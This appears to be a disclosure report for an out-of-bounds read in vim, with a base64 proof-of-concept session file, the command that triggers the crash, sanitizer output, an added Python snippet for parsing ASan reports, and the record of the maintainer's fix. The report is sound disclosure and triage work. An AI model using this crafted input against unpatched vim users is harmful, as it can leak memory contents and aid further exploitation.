Out-of-bounds Read in vim/vim

Status: Valid

Reported on Dec 23rd 2021

Description

A heap-based out-of-bounds read of size 4 occurs when a user opens the vim session file specified below. This happens regardless of any command line options that could be used to restrict vim, such as -Z and -m. The bug was found on the default vim build in Ubuntu 20.04 for x86_64/amd64.

Proof of Concept

Steps to reproduce:

  1. Clone the repo and build with ASAN.

  2. Recreate the PoC session file:

echo -ne "MDAwMDAwbjAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAgMDAwMDAwMCAwMDAwMCAwIDAwMDAwMDAgMDAwCmF1ISogMCBuMAphbA==" | base64 -d > min_read_4

Its content (as decoded from the base64 above; the last line is the abbreviated :all command, which is the ex_all frame in the trace below) is:

000000n0000000000000000000000000000000000000000000000 0000000 00000 0 0000000 000
au!* 0 n0
al

  3. Load the session:

./vim -u NONE -i NONE -n -X -Z -e -m -s -S ./min_read_4 -c ':qa!'

Sanitizer output:

=================================================================
==4102472==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6070000003f8 at pc 0x00000049228a bp 0x7ffeb530bdd0 sp 0x7ffeb530bdc8
READ of size 4 at 0x6070000003f8 thread T0
    #0 0x492289 in alist_name /home/octa/fuzzing_vim/vim_laf_asan/src/arglist.c:877:30
    #1 0x492289 in do_arg_all /home/octa/fuzzing_vim/vim_laf_asan/src/arglist.c:1138:23
    #2 0x492289 in ex_all /home/octa/fuzzing_vim/vim_laf_asan/src/arglist.c:1188:5
    #3 0xcbcf56 in do_one_cmd /home/octa/fuzzing_vim/vim_laf_asan/src/ex_docmd.c:2572:2
    #4 0xcbcf56 in do_cmdline /home/octa/fuzzing_vim/vim_laf_asan/src/ex_docmd.c:994:17
    #5 0x1eb3e64 in do_source /home/octa/fuzzing_vim/vim_laf_asan/src/scriptfile.c:1420:5
    #6 0x1ed7c97 in cmd_source /home/octa/fuzzing_vim/vim_laf_asan/src/scriptfile.c:985:14
    #7 0x1ed7c97 in ex_source /home/octa/fuzzing_vim/vim_laf_asan/src/scriptfile.c:1011:2
    #8 0xcbcf56 in do_one_cmd /home/octa/fuzzing_vim/vim_laf_asan/src/ex_docmd.c:2572:2
    #9 0xcbcf56 in do_cmdline /home/octa/fuzzing_vim/vim_laf_asan/src/ex_docmd.c:994:17
    #10 0x2e24e95 in do_cmdline_cmd /home/octa/fuzzing_vim/vim_laf_asan/src/ex_docmd.c:588:12
    #11 0x2e24e95 in exe_commands /home/octa/fuzzing_vim/vim_laf_asan/src/main.c:3084:2
    #12 0x2e24e95 in vim_main2 /home/octa/fuzzing_vim/vim_laf_asan/src/main.c:775:6
    #13 0x2e13f06 in main /home/octa/fuzzing_vim/vim_laf_asan/src/main.c:426:12
    #14 0x7ff4cc80f0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #15 0x3aa0bd in _start (/home/octa/fuzzing_vim/vim_laf_asan/src/vim+0x3aa0bd)

0x6070000003f8 is located 8 bytes to the right of 80-byte region [0x6070000003a0,0x6070000003f0)
allocated by thread T0 here:
    #0 0x424449 in realloc (/home/octa/fuzzing_vim/vim_laf_asan/src/vim+0x424449)
    #1 0x45fe4d in ga_grow_inner /home/octa/fuzzing_vim/vim_laf_asan/src/alloc.c:735:10

SUMMARY: AddressSanitizer: heap-buffer-overflow /home/octa/fuzzing_vim/vim_laf_asan/src/arglist.c:877:30 in alist_name
==4102472==ABORTING
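As an added triage aid (not part of the original report), the following Python snippet parses the key fields out of an AddressSanitizer heap-buffer-overflow report such as the one above and recomputes the overflow distance from the raw addresses instead of trusting the prose line. The embedded report text is the page's own sanitizer output, trimmed to the lines the parser needs; the function names are this example's own.

```python
import re

# The page's own AddressSanitizer output, trimmed to the lines the parser needs.
ASAN_REPORT = """\
==4102472==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6070000003f8 at pc 0x00000049228a bp 0x7ffeb530bdd0 sp 0x7ffeb530bdc8
READ of size 4 at 0x6070000003f8 thread T0
    #0 0x492289 in alist_name /home/octa/fuzzing_vim/vim_laf_asan/src/arglist.c:877:30
    #1 0x492289 in do_arg_all /home/octa/fuzzing_vim/vim_laf_asan/src/arglist.c:1138:23
    #2 0x492289 in ex_all /home/octa/fuzzing_vim/vim_laf_asan/src/arglist.c:1188:5
0x6070000003f8 is located 8 bytes to the right of 80-byte region [0x6070000003a0,0x6070000003f0)
allocated by thread T0 here:
    #0 0x424449 in realloc (/home/octa/fuzzing_vim/vim_laf_asan/src/vim+0x424449)
    #1 0x45fe4d in ga_grow_inner /home/octa/fuzzing_vim/vim_laf_asan/src/alloc.c:735:10
"""

ERROR_RE = re.compile(r"ERROR: AddressSanitizer: (\S+) on address (0x[0-9a-f]+)")
ACCESS_RE = re.compile(r"^(READ|WRITE) of size (\d+) at (0x[0-9a-f]+)", re.M)
FRAME_RE = re.compile(r"^\s+#\d+ 0x[0-9a-f]+ in (\S+) (\S+)", re.M)
REGION_RE = re.compile(r"is located \d+ bytes to the (left|right) of (\d+)-byte "
                       r"region \[(0x[0-9a-f]+),(0x[0-9a-f]+)\)")

def parse_asan_report(text):
    """Pull the triage-relevant fields out of an ASan heap-buffer-overflow report."""
    err, acc, reg = ERROR_RE.search(text), ACCESS_RE.search(text), REGION_RE.search(text)
    if not (err and acc and reg):
        raise ValueError("not a recognised ASan heap-buffer-overflow report")
    # Frames before 'allocated by' are the faulting stack; frames after it show the allocator.
    head, _, alloc = text.partition("allocated by")
    return {
        "kind": err.group(1),
        "access": acc.group(1),
        "size": int(acc.group(2)),
        "address": int(acc.group(3), 16),
        "side": reg.group(1),
        "region_size": int(reg.group(2)),
        "region": (int(reg.group(3), 16), int(reg.group(4), 16)),
        "fault_frames": FRAME_RE.findall(head),   # [(function, location), ...]
        "alloc_frames": FRAME_RE.findall(alloc),
    }

def overflow_offset(report):
    """Distance from the region edge to the faulting address, recomputed from the addresses."""
    start, end = report["region"]
    return report["address"] - end if report["side"] == "right" else start - report["address"]

def summarize(report):
    # One-line triage summary, e.g. for a bug-tracker title.
    func, loc = report["fault_frames"][0]
    return (f"{report['kind']}: {report['access']} of {report['size']} bytes, "
            f"{overflow_offset(report)} bytes outside the {report['region_size']}-byte "
            f"heap region, in {func} ({loc.rsplit('/', 1)[-1]})")
```

The allocator frames tell you the overflowed region is a vim growarray (ga_grow_inner), which is the first thing to check when deciding whether an index or length bookkeeping error is the likely root cause.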

Impact

This vulnerability is capable of disclosing data and might allow bypassing protection mechanisms, facilitating successful exploitation of other memory corruption vulnerabilities that could lead to code execution.

Acknowledgements

This bug was found by Octavio Gianatiempo (ogianatiempo@faradaysec.com) and Octavio Galland (ogalland@faradaysec.com) from Faraday Research Team.

We are processing your report and will contact the vim team within 24 hours. (9 months ago)
We have contacted a member of the vim team and are waiting to hear back. (9 months ago)
Bram Moolenaar validated this vulnerability. (9 months ago)
Octavio Gianatiempo has been awarded the disclosure bounty.
The fix bounty is now up for grabs.

Bram Moolenaar (Maintainer), 9 months ago:

I can reproduce the crash. I simplified the script a bit and turned it into a test. A fix is in patch 8.2.3884. The test gives a valgrind error before the patch.

Bram Moolenaar confirmed that a fix has been merged on 6f9837. (9 months ago)
Bram Moolenaar has been awarded the fix bounty.